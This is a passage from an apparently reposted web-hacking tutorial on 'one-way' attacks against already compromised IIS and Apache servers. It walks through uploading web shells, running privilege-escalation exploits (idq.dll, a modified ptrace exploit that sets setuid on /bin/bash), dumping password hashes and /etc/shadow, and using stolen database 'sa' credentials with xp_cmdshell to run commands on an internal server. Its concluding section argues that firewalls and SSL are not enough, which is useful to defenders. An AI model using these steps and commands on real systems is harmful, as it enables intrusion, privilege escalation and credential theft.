Finalllllllllllllllllllllllllllllllllllllllllllllllllllllllllllly

6.0 One-Way Privilege Escalation
Web based command prompts, as discussed in section 4.0, inherit the privileges of the process under which they are running. Usually, these privileges are restricted user level privileges, unless the web server process is running with elevated privileges. A few application servers, which plug-in to the front end web server, run with elevated privileges. To take the attack deeper, in most cases, one would need some sort of privilege escalation, after installing a web based command prompt and an HTTP file uploader.

Privilege escalation attacks are nothing unique. There are many exploits for various operating systems which result in escalating the privileges to either the super user, or to a more privileged user. Most privilege escalation attacks can be adapted to the one-way attack technique.

A detailed discussion of privilege escalation attacks is not within the scope of this paper. We shall discuss two examples of privilege escalation attacks, "Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability" [5] for the Windows and IIS platform, and the "Linux Ptrace/Setuid Exec Vulnerability" [6] for the Linux and Apache platform.

Care must be taken that the privilege escalation exploit runs non-interactively, i.e. it should not require an interactive shell, an interactive terminal, a GUI console, etc. For this example, we had to modify the Linux ptrace exploit to adapt it for one-way use.


6.1 Windows/IIS privilege escalation
Let us take the case of www1.example.com, which is a Windows 2000 server running IIS 5.0. We shall assume that is has already been compromised, and a file uploader script upload.asp as shown in section 5.0.1 is present on this server.


6.1.1 Uploading the Windows attack tools
We shall now upload a web based command prompt - cmdasp.asp, as explained in section 4.0.2 and two more binaries - idq.dll and pwdump.exe. idq.dll is a privilege escalation exploit which takes advantage of the Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability [5]. Upon invocation, it adds the IUSR_machinename and IWAM_machinename accounts to the Administrators group, thereby giving administrative privileges to all the processes and applications run under the IIS process, including the web based command prompt. pwdump.exe is a binary to dump the password hashes, and requires administrative privileges to run.

The screenshot below shows these three binaries being uploaded on www1.example.com.



We can check whether the files have been successfully uploaded using cmdasp.asp and running the "dir" command, as shown below:



We shall now check the members of the Administrators group, by issuing the command "net localgroup administrators" as shown below:



The only member of the Administrators group is the Administrator user.


6.1.2 idq.dll - privilege escalation
The next step is to attempt to invoke idq.dll, to escalate the privileges of the IUSR_machinename and IWAM_machinename accounts. The process is very simple. The following URL:



has to be accessed on the web server. No results are displayed, instead, the connection times out after a while. This indicates that the attack has most likely succeeded.
To verify if the attack has indeed succeeded, we shall now check the members of the Administrators group again, as shown below:



The IUSR_W2KVM and IWAM_W2KVM accounts are now members of the Administrators group. Therefore all commands executed via cmdasp.asp assume administrative privileges, as is demonstrated by running the pwdump.exe binary, shown below:



We now have full administrative control of www1.example.com


6.2 Linux/Apache privilege escalation
For this example, we shall look at www2.example.com, which is a Linux server running 2.4 kernel and Apache 1.3.27. As with the previous example, we shall assume that is has already been compromised, and a file uploader script upload.cgi as shown in section 5.0.2 is present on this server.


6.2.1 Uploading the Unix attack tools
For this server, we shall upload a web based command prompt - shell.cgi, as explained in section 4.0.1 and another file - ptrace1.c. ptrace1.c is a privilege escalation exploit based on the Linux Ptrace/Setuid Exec Vulnerability [6]. The exploit is slightly modified, to adapt it for one-way use. When run successfully, the exploit applies the setuid permission to /bin/bash, which is owned by the root user. This causes any shell command executed through /bin/bash, to run with super-user privileges. The web based command prompt, shell.cgi, internally invokes /bin/bash, and therefore all commands executed via shell.cgi shall run as the root user.

The source code of the modified ptrace exploit is available here

The screenshots below show these two files being uploaded on www2.example.com.





We shall now compile ptrace1.c and check if it has been compiled properly. We shall also check our current privileges. The screenshot below shows the following commands executed via shell.cgi:

gcc -o ptrace1 ptrace1.c
ls -la
id



The privileges extended to shell.cgi are those of the "nobody" user.


6.2.2 ptrace1.c - privilege escalation
The next step is to attempt to execute ptrace1, to see if we can apply the setuid permissions to /bin/bash. The exploit ptrace1.c internally executes the following command:

/bin/chmod 4755 /bin/bash

The screenshot below shows ptrace1 being executed and the file listing for /bin/bash:


Sure enough, the /bin/bash binary has the setuid permission applied to it.

The next screenshot shows two commands being executed:

id
cat /etc/shadow



Notice that the effective uid (euid) of the shell.cgi process is 0, which is that of the root user. The fact that we were able to view the contents of the /etc/shadow file proves that the privileges have been escalated.

We now have full super-user control of www2.example.com


7.0 Web based SQL Command Prompts
One-way hacking can be extended to areas other than file transfer and remote command execution via HTTP. One of the most important components in an application is the database. This section shows how we can extend the concept of one-way hacking to interactively control database servers, by creating what are called web based SQL command prompts.

Web based SQL command prompts allow a user to connect to a database server via an HTML interface, and execute SQL queries on the back-end database through an HTML form.

The web based SQL command prompt uses the same techniques as any database driven web application would use. Web programming languages such as PHP and ASP provide functionality to connect to back-end databases.

In many cases, once a web server has been compromised, an attacker would generally look at the source code and application configuration files hosted on the web server to figure out where the database lies, and the credentials to access it. This knowledge can be used when attacking a database using a web based SQL command prompt.


7.1 Anatomy of an SQL command prompt - sqlquery.asp
The image below shows an example of a web based SQL command prompt created using ASP.



There are five key input areas in this form:

Server Name: The symbolic name or IP address of the database server. In most cases, the database server is an entirely different system than the web server.
Database Name: The name of the database out of the collection of databases hosted on the database server.
User Name: The database user whose credentials will be used when establishing the database connection.
Password: Password for the database user. Generally, the database user and password are recovered from inspecting the application source code and configuration files hosted on the compromised web server.
Query String: The SQL query that is to be sent and executed on the database.


The other two parameters Driver and Connection String are used for selecting the proper driver and path for the database. Connection String is an optional parameter. In sqlquery.asp, we have an option of connecting via four drivers, namely Microsoft SQL server, Oracle over ODBC, MySQL over ODBC and Foxpro. More drivers can be added very easily.

The source code for sqlquery.asp is given here. It is possible to create such web based SQL command prompts with languages such as PHP, Perl, JSP, etc.

(Thanks to Ketan Vyas for sqlquery.asp)


7.2 An example - IIS and MS SQL server
We now present a scenario showing how sqlquery.asp can be used in hacking database servers which lie on an internal network. The diagram below shows the application layout of the web server, www1.example.com, and the database server 10.0.1.2.

We assume that www1.example.com has already been compromised and a web based file uploader, upload.asp, and a web based command prompt, cmdasp.asp are present on it. We make no assumptions about privilege escalation.



We shall now upload sqlquery.asp on www1.example.com, and use it to attack the database server on 10.0.1.2.


7.3 Uploading sqlquery.asp
The screenshot below shows sqlquery.asp being uploaded by the file uploader, upload.asp, on to www1.example.com




7.4 Pilfering the web application
Before we can connect to the back-end database, we need to know how to establish a connection to the database, and with what credentials. Upon inspecting the source code of the web application hosted on www1.example.com, the following lines were found:

Set Con = Server.CreateObject("ADODB.Connection")
Con.Open "Provider=SQLOLEDB; Data Source=10.0.1.2; Initial Catalog=art;
User Id=sa; Password=sys+adm!n"
Set RS = Con.Execute("select StockNumber,Name,Description,Artist,
ListPrice,image from PRODUCTS where ID = " +
Request.QueryString("ID"))

These lines from the application source code provide us with enough information to connect to the back-end database server on 10.0.1.2.


7.5 Executing SQL queries via sqlquery.asp
Using the above credentials with sqlquery.asp, it is possible to execute arbitrary SQL statements on the database server. The screenshot below shows the results of the query "SELECT * FROM SYSDATABASES;":



The next screenshot shows application data being displayed from a table called PRODUCTS, hosted on the "art" database:




7.6 Executing stored procedures
The SQL command prompt can also be used for executing stored procedures. In this example, we are accessing the back-end database using system administrator (sa) privileges. Therefore it is possible to execute stored procedures such as "xp_cmdshell" to execute arbitrary commands on the database.

The screenshot below shows the "ipconfig" command being run on the database using the "xp_cmdshell" stored procedure:



We have achieved remote command execution on an internal server which is not accessible from the outside!

In fact, with this same example, we have also achieved privilege escalation, since we are accessing the database using system administrator credentials. A quick check by running "whoami.exe" would show us what privileges we get:



The above screenshot verifies that we indeed have administrative privileges, that of the "NT_AUTHORITY\SYSTEM" user.


8.0 Concluding thoughts
One-way hacks illustrate the fact that firewalls are not enough to protect a web application. A tight firewall can make things difficult for an attacker, but not keep the attacker entirely away. In fact, with tools like the file uploader, the web based command prompt and the web based SQL command prompt, it is just as easy to attack a web application and the underlying network with a tight firewall in place.

SSL makes things even worse [8], from the point of view of securing the application. Many people think that SSL prevents such attacks. It does not. SSL is used only to encrypt the data between the web browser and the web server, to prevent eavesdropping. SSL provides no security to the web application, or the underlying network. All one-way hacks can be easily adapted to SSL, using libraries such as OpenSSL.

i hope every body Interest from this subject

With my greeting

Created By : *-..-* DaRk EvIl *-..-*